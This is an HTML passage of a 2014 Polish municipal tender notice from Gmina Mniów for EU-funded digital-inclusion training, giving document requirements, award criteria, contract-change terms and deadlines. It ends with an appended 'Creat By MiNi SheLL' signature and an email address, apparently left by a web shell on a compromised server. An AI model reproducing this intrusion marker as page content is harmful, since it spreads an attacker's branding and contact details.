<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Proponowany program szkolenia (konspekt) obejmujący obszary szkolenia wskazane w pkt. III.1 ppkt  1 i 2, ze szczegółowym zakresem, metodyką oraz wskazaniem użytych środków technicznych i edukacyjnych w trakcie planowanych szkoleń.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Konspekt - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>XXV.2	Zamawiający dopuszcza możliwość zmian istotnych postanowień umowy w porównaniu do treści oferty, na podstawie której dokonano wyboru Wykonawcy, przy zaistnieniu następujących okoliczności:
1)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia - w takim przypadku umowa będzie mogła zostać dostosowana do zaistniałych okoliczności;
2)	jeśli nastąpi zmiana przepisów dot. podatku VAT lub innych przepisów powszechnie obowiązujących, które będą miały wpływ na realizację umowy - w takim przypadku umowa będzie mogła być dostosowana do tych przepisów,
3)	jeżeli wystąpią okoliczności niezależne od Wykonawcy, uniemożliwiające wykonanie zamówienia w terminach określonych w umowie lub w terminach wynikających z harmonogramu realizacji zamówienia - wówczas zmiana umowy może dotyczyć przedłużenia terminu wykonania umowy lub etapu i dostosowania do wydłużonego terminu innych postanowień umowy,
4)	jeżeli nastąpi konieczność modyfikacji jej poszczególnych zapisów w celu zachowania spójności z treścią materiałów przedłożonych przez Wykonawców w ofertach a Zamawiający uznał za celowe ich załączenie do umowy w celu zapewnienia powodzenia realizacji przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mniów
ul. Centralna 9
26-080 Mniów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2014 godzina 12:00, miejsce: Urząd Gminy Mniów
ul. Centralna 9
26-080 Mniów
Sekretariat pok. nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion Programu Operacyjnego Innowacyjna Gospodarka..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com